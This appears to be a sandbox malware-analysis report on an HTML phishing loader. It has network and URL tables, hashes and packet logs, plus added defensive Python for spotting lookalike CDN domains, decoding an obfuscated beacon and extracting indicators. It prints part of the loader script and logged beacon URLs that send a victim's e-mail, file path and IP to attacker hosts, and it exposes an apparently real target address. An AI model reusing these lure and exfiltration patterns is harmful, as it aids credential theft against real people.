https://aadcdn.msauthimages.net/dbd5a2dd-us0mikl89yxon-sgdcnggg1-x8-vglc85xxjmtn1cza/logintenantbranding/0/bannerlogo?ts=637227555210461681 | 0% | Avira URL Cloud | safe
https://maxcdn.bootstrapcdn.rest/jquery-3.5.2.min.js | 0% | Avira URL Cloud | safe
https://maxcdn.bootstrapcdn.cloud/jquery-3.5.2.min.js | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
descansonline.com | 188.114.96.3 | true | false | - | unknown
d26p066pn2w0s0.cloudfront.net | 18.172.153.55 | true | false | - | high
accounts.google.com | 172.217.168.45 | true | false | - | high
i.postimg.cc | 162.19.88.68 | true | false | - | unknown
www.google.com | 172.217.168.68 | true | false | - | high
code.jquery.quest | 38.34.185.163 | true | false | - | unknown
clients.l.google.com | 142.250.203.110 | true | false | - | high
maxcdn.bootstrapcdn.rest | 172.67.188.128 | true | false | - | unknown
code.jquery.com.de | 38.34.185.163 | true | false | - | unknown
cs1025.wpc.upsiloncdn.net | 152.199.23.72 | true | false | - | unknown
maxcdn.bootstrapcdn.cloud | 68.65.123.205 | true | false | - | unknown
aadcdn.msauthimages.net | unknown | unknown | false | - | unknown
clients2.google.com | unknown | unknown | false | - | high
logo.clearbit.com | unknown | unknown | false | - | high
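Four of the contacted hosts (code.jquery.quest, code.jquery.com.de, maxcdn.bootstrapcdn.rest, maxcdn.bootstrapcdn.cloud) keep the full hostname of a well-known CDN and hang it under a different registrable suffix, and two of the requests to maxcdn.bootstrapcdn.cloud carry the target's e-mail address and the local path of the opened file in the query string. The script below is an added example written for this report, not code from Joe Sandbox or from the phishing kit. It flags both patterns over a constructed proxy log built from the URLs listed above; the log line format and the reference list of legitimate CDN hosts (code.jquery.com, maxcdn.bootstrapcdn.com) are my assumptions and do not come from the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Reference set of the real CDN hosts the lookalikes imitate. Assumption for this
# example; these two hosts do not appear in the sandbox report.
LEGIT_CDN_HOSTS = ("code.jquery.com", "maxcdn.bootstrapcdn.com")

EMAIL_RE = re.compile(r"[^@\s/]+@[^@\s/]+\.[A-Za-z]{2,}")

# Constructed proxy log in "timestamp client_ip METHOD url" form. The URLs are the
# ones the report lists; the surrounding log format is made up for this example.
SAMPLE_LOG = """\
2022-11-29T19:59:11Z 192.168.2.3 GET https://code.jquery.quest/jquery-3.5.2.min.js
2022-11-29T19:59:11Z 192.168.2.3 GET https://maxcdn.bootstrapcdn.rest/jquery-3.5.2.min.js
2022-11-29T19:59:11Z 192.168.2.3 GET https://code.jquery.com.de/ip.php
2022-11-29T19:59:12Z 192.168.2.3 GET https://code.jquery.com/jquery-3.5.2.min.js
2022-11-29T19:59:13Z 192.168.2.3 GET https://i.postimg.cc/jSY8DXQL/back.jpg
2022-11-29T19:59:17Z 192.168.2.3 GET https://maxcdn.bootstrapcdn.cloud/ndata/index.php?dt=wendy.lang@dmv.ca.gov
2022-11-29T19:59:17Z 192.168.2.3 GET https://maxcdn.bootstrapcdn.cloud/post/index.php?title=Sign%20in%20to%20your%20account&link=file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html&time=2022-11-29%2019:59:17&ip=102.129.143.49%20:%20Switzerland
"""


def lookalike_of(host):
    """Return the legitimate CDN host that `host` imitates, or None.

    A lookalike keeps the real hostname minus its last label as a prefix
    ("code.jquery.") but is neither the real host nor a subdomain of it, so
    code.jquery.quest and code.jquery.com.de are flagged while
    code.jquery.com and cdn.code.jquery.com are not.
    """
    host = host.lower().rstrip(".")
    for legit in LEGIT_CDN_HOSTS:
        if host == legit or host.endswith("." + legit):
            return None
        prefix = legit.rsplit(".", 1)[0] + "."
        if host.startswith(prefix):
            return legit
    return None


def suspicious_query_values(url):
    """Yield (kind, value) for query parameters carrying victim data in clear text."""
    for values in parse_qs(urlsplit(url).query).values():
        for value in values:
            email = EMAIL_RE.search(value)
            if email:
                yield "email_in_query", email.group(0)
            if value.lower().startswith("file:"):
                yield "local_path_in_query", value


def analyze(log):
    """Run both checks over every log line; return one alert dict per finding."""
    alerts = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split(None, 3)
        host = urlsplit(url).hostname or ""
        legit = lookalike_of(host)
        if legit:
            alerts.append({"ts": ts, "client": client, "kind": "lookalike_cdn",
                           "host": host, "detail": legit})
        for kind, value in suspicious_query_values(url):
            alerts.append({"ts": ts, "client": client, "kind": kind,
                           "host": host, "detail": value})
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(f'{a["ts"]} {a["client"]} {a["kind"]:20} {a["host"]} -> {a["detail"]}')
```

On the sample log this yields five lookalike alerts (the real code.jquery.com and i.postimg.cc lines stay quiet), one e-mail-in-query alert for the ndata request and one local-path alert for the post request. The prefix match is deliberately narrow: it catches the "same hostname, different suffix" trick used here but says nothing about other typosquats, so treat it as one signal among several rather than a complete lookalike detector.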
Name | Malicious | Antivirus Detection | Reputation
file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html | false | - | low
https://maxcdn.bootstrapcdn.cloud/catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 | false | Avira URL Cloud: safe | unknown
https://i.postimg.cc/jSY8DXQL/back.jpg | false | Avira URL Cloud: safe | unknown
https://descansonline.com/wp/b1.js | false | Avira URL Cloud: safe | unknown
https://code.jquery.com.de/ip.php | false | Avira URL Cloud: safe | unknown
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard | false | - | high
https://code.jquery.com.de/jquery-3.5.2.min.js | false | Avira URL Cloud: safe | unknown
https://code.jquery.quest/jquery-3.5.2.min.js | false | Avira URL Cloud: safe | unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 | false | - | high
https://maxcdn.bootstrapcdn.cloud/post/index.php?title=Sign%20in%20to%20your%20account&link=file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html&time=2022-11-29%2019:59:17&ip=102.129.143.49%20:%20Switzerland | false | Avira URL Cloud: safe | unknown
https://maxcdn.bootstrapcdn.cloud/ndata/index.php?dt=wendy.lang@dmv.ca.gov | false | Avira URL Cloud: safe | unknown
https://maxcdn.bootstrapcdn.cloud/tkv/index.php?dt=QCPsVcn7rgD1hKIR25CTCLE0O | false | Avira URL Cloud: safe | unknown
https://logo.clearbit.com/dmv.ca.gov | false | - | high
https://maxcdn.bootstrapcdn.rest/jquery-3.5.2.min.js | false | Avira URL Cloud: safe | unknown
https://aadcdn.msauthimages.net/dbd5a2dd-us0mikl89yxon-sgdcnggg1-x8-vglc85xxjmtn1cza/logintenantbranding/0/bannerlogo?ts=637227555210461681 | false | Avira URL Cloud: safe | unknown
https://maxcdn.bootstrapcdn.cloud/jquery-3.5.2.min.js | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://descansonline.com/wp/b1.php | November Draw Disbursed.html | false | Avira URL Cloud: safe | unknown

The "safe" labels and 0% detection rates above are reputation results for URLs with no prior history (reputation "unknown"), not a verdict on what the requests carry. The ndata, post and catch requests to maxcdn.bootstrapcdn.cloud visibly send the target e-mail address, the local path of the opened file, the sandbox's public IP and country, and a numeric payload in their query strings.
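The catch/index.php request above carries a dt parameter that is a list of integers. Every integer in it is a multiple of 41, and dividing by 41 gives ASCII code points: 1312 is a space, 5084 is "|", 2009/1968/2050 are "1", "0", "2", and the whole list reads as one record containing the same IP address, country and page title that the post/index.php beacon sends in clear text, followed by the e-mail address from the ndata beacon. The decoder below is an added example written for this report, not code from the phishing kit or from Joe Sandbox. It infers the multiplier as the gcd of the values rather than hard-coding 41, and the field names (ip, country, title, values) are my labels for the layout seen in this one sample; the report does not establish what the last three comma-separated values mean, and the tkv/index.php dt value is a different, opaque format that this decoder does not cover.

```python
import re
from functools import reduce
from math import gcd

# The dt value of the catch/index.php request, copied verbatim from this report's URL list.
DT_SAMPLE = (
    "1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,"
    "1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,"
    "2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,"
    "4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,"
    "4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,"
    "4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,"
    "4305,4223,4510,1312,2993,4510,410"
)

# Layout of the decoded record as seen in this sample; the group names are my labels.
RECORD_RE = re.compile(
    r"^\|\s*(?P<ip>\S+)\s*:\s*(?P<country>.*?)\s*==>\s*\(\s*(?P<title>.*?)\s*\)\s*:,(?P<values>.*)$"
)


def parse_dt(dt):
    """Split the comma-separated parameter into integers (raises on anything else)."""
    return [int(tok) for tok in dt.split(",") if tok]


def infer_multiplier(values):
    """Assume each number is code_point * k and recover k as the gcd of all values.

    Works because the plaintext contains characters whose code points are
    coprime (e.g. space 32 and '1' 49), so nothing but k survives the gcd.
    """
    if not values:
        raise ValueError("empty dt")
    return reduce(gcd, values)


def decode_dt(dt, multiplier=None):
    """Return the decoded text, or raise ValueError if the scaling does not hold."""
    values = parse_dt(dt)
    k = multiplier or infer_multiplier(values)
    if k < 2 or any(v % k for v in values):
        raise ValueError("dt is not a list of code points scaled by one factor")
    return "".join(chr(v // k) for v in values)


def looks_scaled(dt):
    """True if dt decodes cleanly under the scaled-code-point scheme."""
    try:
        decode_dt(dt)
        return True
    except ValueError:
        return False


def decoded_fields(dt):
    """Decode and split the record into its visible pieces (labels are assumptions)."""
    text = decode_dt(dt).strip()
    m = RECORD_RE.match(text)
    if not m:
        return {"raw": text}
    return {"ip": m["ip"], "country": m["country"], "title": m["title"],
            "values": m["values"].split(",")}


if __name__ == "__main__":
    print("multiplier:", infer_multiplier(parse_dt(DT_SAMPLE)))
    print(decoded_fields(DT_SAMPLE))
```

Checking the decoded IP, country and title against the clear-text post/index.php parameters is the validation step: if the inferred multiplier were wrong the decoded text would be garbage, not the same three strings the other beacon already sends.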
IP | Domain | Country | ASN | ASN Name | Malicious
152.199.23.72 | cs1025.wpc.upsiloncdn.net | United States | 15133 | EDGECASTUS | false
68.65.123.205 | maxcdn.bootstrapcdn.cloud | United States | 22612 | NAMECHEAP-NETUS | false
162.19.88.68 | i.postimg.cc | United States | 209 | CENTURYLINK-US-LEGACY-QWESTUS | false
38.34.185.163 | code.jquery.quest | United States | 174 | COGENT-174US | false
142.250.203.110 | clients.l.google.com | United States | 15169 | GOOGLEUS | false
18.172.153.55 | d26p066pn2w0s0.cloudfront.net | United States | 3 | MIT-GATEWAYSUS | false
172.217.168.68 | www.google.com | United States | 15169 | GOOGLEUS | false
172.217.168.45 | accounts.google.com | United States | 15169 | GOOGLEUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
188.114.96.3 | descansonline.com | European Union | 13335 | CLOUDFLARENETUS | false
172.67.188.128 | maxcdn.bootstrapcdn.rest | United States | 13335 | CLOUDFLARENETUS | false
                                IP
                                192.168.2.1
                                127.0.0.1
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 756202
Start date and time: 2022-11-29 19:58:14 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 42s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: November Draw Disbursed.html
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal56.phis.winHTML@27/0@16/13
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .html
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 172.217.168.67, 34.104.35.123
• Excluded domains from analysis (whitelisted): fs.microsoft.com, edgedl.me.gvt1.com, aadcdn.azureedge.net, aadcdn.ec.azureedge.net, update.googleapis.com, clientservices.googleapis.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big; too many NtWriteVirtualMemory calls found
                                No simulations
                                No context
No created / dropped files found

File type: HTML document, ASCII text, with CRLF line terminators
Entropy (8bit): 5.340590656103303
TrID:
• HTML Application (8008/1) 100.00%
File name: November Draw Disbursed.html
File size: 444
MD5: c0d6d8acc86ed388214581788ec837d8
SHA1: c846ee109e9ee8e373ff09412a59e3aeec06fd44
SHA256: 2209177e77a2dabd0c034500ee64ccca71d8985c7c564ce31898ca2326bb6d78
SHA512: 0ffdc4579cb9b2edee23f3a9fd5da4062a0285586c5395e2de19708b71024c6a3741397a5a10aa055d56d1e6a2c2b8e032f2e9584a8dbf554ce25c9242ca0279
SSDEEP: 12:7KPA2JZoH3TuBVKHuHAHYoHcI4DMEGVdDVRxb:7CAuZoXKBcQAHYo8Istaxb
TLSH: C8F05C502C4C4A4005341E718078960DD01F492CDE8CC9C296D768562950FDE2ECA6C4
File Content Preview (CRLF line breaks rendered as line breaks; the preview stops after the third variable, the full file is 444 bytes):
<script>
 var Tse0sed5 = "https://descansonline.com/wp/b1.php"; // php file link normal or B64
 var RTse0dsqqs = "wendy.lang@dmv.ca.gov"; //email normal or B64
 var e0zs52658 = "https://descansonline.com/wp/b1.js"; //js file link normal or B64
Icon Hash: 78d0a8cccc88c460
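The preview shows the shape of this loader: a tiny HTML file whose script holds three string variables with random-looking names (the PHP collector URL, the target's e-mail address, and the URL of the JavaScript that draws the login page), and whose own comments say each value may be stored "normal or B64". Because the variable names change per sample, a triage script should key on the shape of the values, not the names. The helper below is an added example written for this report, not code from the phishing kit or from Joe Sandbox. It pulls every quoted string variable out of the script, transparently base64-decodes values that look encoded, classifies them by shape, and derives a host list for blocking. The embedded sample reproduces the preview above and nothing past it; the base64 variant it also tests is constructed here to exercise the "B64" case the comments mention.

```python
import base64
import binascii
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed copy of the script preview shown in this report. The report's preview stops
# after the third variable; nothing beyond that point is assumed here.
SAMPLE_HTML = (
    "<script>\r\n"
    ' var Tse0sed5 = "https://descansonline.com/wp/b1.php"; // php file link normal or B64\r\n'
    ' var RTse0dsqqs = "wendy.lang@dmv.ca.gov"; //email normal or B64\r\n'
    ' var e0zs52658 = "https://descansonline.com/wp/b1.js"; //js file link normal or B64\r\n'
)

VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"\s*;')
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[A-Za-z]{2,}$")
URL_RE = re.compile(r"^https?://", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def maybe_b64(value):
    """Return the decoded string if `value` is well-formed base64 of printable UTF-8,
    otherwise return `value` unchanged (plain URLs and e-mails fail the charset test)."""
    if len(value) % 4 or not B64_RE.fullmatch(value):
        return value
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return value
    return decoded if decoded.isprintable() else value


def classify(value):
    """Label a decoded value by its shape: e-mail, PHP collector, JS payload or other URL."""
    if EMAIL_RE.match(value):
        return "email"
    if URL_RE.match(value):
        path = urlsplit(value).path.lower()
        if path.endswith(".php"):
            return "php_collector"
        if path.endswith(".js"):
            return "js_payload"
        return "url"
    return None


def extract_iocs(html):
    """Map each recognised kind to the list of values found in the script."""
    found = defaultdict(list)
    for _name, raw in VAR_RE.findall(html):
        kind = classify(maybe_b64(raw))
        if kind:
            found[kind].append(maybe_b64(raw))
    return dict(found)


def collector_hosts(iocs):
    """Hostnames of every URL-shaped indicator, for a block list."""
    kinds = ("php_collector", "js_payload", "url")
    return sorted({urlsplit(u).hostname for k in kinds for u in iocs.get(k, [])})


def encode_values(html):
    """Constructed variant: base64-encode every quoted var value, the "B64" form the
    kit's own comments mention, so the decoder path can be exercised offline."""
    return VAR_RE.sub(
        lambda m: 'var %s = "%s";' % (m.group(1), base64.b64encode(m.group(2).encode()).decode()),
        html,
    )


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_HTML)
    print(iocs)
    print("block:", collector_hosts(iocs))
    print("b64 variant decodes identically:", extract_iocs(encode_values(SAMPLE_HTML)) == iocs)
```

The target e-mail is treated as an indicator too: it identifies who the lure was built for, which is the first thing to hand to the mailbox owner's team. Note that the e-mail value cannot be mistaken for base64 because "@" and "." are outside the base64 alphabet, and a plain URL fails for the same reason on ":" and "/".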
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/29/22-19:59:13.326192 | UDP | 2027758 | ET DNS Query for .cc TLD | 55638 | 53 | 192.168.2.3 | 8.8.8.8
11/29/22-19:59:15.999356 | UDP | 2027758 | ET DNS Query for .cc TLD | 53848 | 53 | 192.168.2.3 | 8.8.8.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 19:59:07.092547894 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:07.092595100 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:07.092681885 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:07.094491959 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:07.094507933 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:07.166402102 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:07.166858912 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:07.166901112 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:07.167536974 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:07.167625904 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:07.168848991 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:07.168930054 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:08.287462950 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:08.287523031 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:08.287798882 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:08.287830114 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:08.287846088 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:08.324126005 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:08.324261904 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:08.324322939 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:08.324359894 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:08.324426889 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:08.326643944 CET | 49698 | 443 | 192.168.2.3 | 142.250.203.110
Nov 29, 2022 19:59:08.326693058 CET | 443 | 49698 | 142.250.203.110 | 192.168.2.3
Nov 29, 2022 19:59:08.399707079 CET | 49700 | 443 | 192.168.2.3 | 172.217.168.45
Nov 29, 2022 19:59:08.399802923 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.399893045 CET | 49700 | 443 | 192.168.2.3 | 172.217.168.45
Nov 29, 2022 19:59:08.400326014 CET | 49700 | 443 | 192.168.2.3 | 172.217.168.45
Nov 29, 2022 19:59:08.400360107 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.469950914 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.496452093 CET | 49700 | 443 | 192.168.2.3 | 172.217.168.45
Nov 29, 2022 19:59:08.496521950 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.499883890 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.500020027 CET | 49700 | 443 | 192.168.2.3 | 172.217.168.45
Nov 29, 2022 19:59:08.502785921 CET | 49700 | 443 | 192.168.2.3 | 172.217.168.45
Nov 29, 2022 19:59:08.502815962 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.503006935 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.503032923 CET | 49700 | 443 | 192.168.2.3 | 172.217.168.45
Nov 29, 2022 19:59:08.503046989 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.560476065 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.560601950 CET | 49700 | 443 | 192.168.2.3 | 172.217.168.45
Nov 29, 2022 19:59:08.560652018 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.560854912 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:08.560923100 CET | 49700 | 443 | 192.168.2.3 | 172.217.168.45
Nov 29, 2022 19:59:08.562552929 CET | 49700 | 443 | 192.168.2.3 | 172.217.168.45
Nov 29, 2022 19:59:08.562591076 CET | 443 | 49700 | 172.217.168.45 | 192.168.2.3
Nov 29, 2022 19:59:10.500958920 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.501024008 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.501147985 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.502063036 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.502099037 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.602175951 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.705908060 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.788549900 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.788599968 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.792459011 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.792560101 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.792576075 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.795406103 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.795454979 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.795700073 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.795718908 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.795739889 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.840694904 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.840900898 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.840935946 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.841027021 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.841114998 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.841135979 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.841164112 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.841223955 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.841255903 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.841402054 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.841486931 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.841532946 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.841893911 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.842000008 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.842005014 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.842065096 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.842122078 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.842139959 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.842787981 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.842866898 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.842880964 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.842916965 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.843008041 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.843671083 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.843848944 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.843925953 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.843928099 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.843950987 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.843998909 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.844558954 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.844710112 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.844772100 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.844784021 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.845551014 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.845628023 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Nov 29, 2022 19:59:10.845634937 CET | 49701 | 443 | 192.168.2.3 | 188.114.96.3
Nov 29, 2022 19:59:10.845654964 CET | 443 | 49701 | 188.114.96.3 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 19:59:07.068732023 CET | 57840 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:07.086155891 CET | 53 | 57840 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 19:59:07.472232103 CET | 57990 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:07.510745049 CET | 53 | 57990 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 19:59:09.219088078 CET | 60625 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:09.243546963 CET | 53 | 60625 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 19:59:11.034914970 CET | 52955 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:11.042839050 CET | 60582 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:11.043695927 CET | 57134 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:11.044045925 CET | 62050 | 53 | 192.168.2.3 | 8.8.8.8
Nov 29, 2022 19:59:11.055634022 CET | 53 | 52955 | 8.8.8.8 | 192.168.2.3
Nov 29, 2022 19:59:11.066426992 CET | 53 | 57134 | 8.8.8.8 | 192.168.2.3
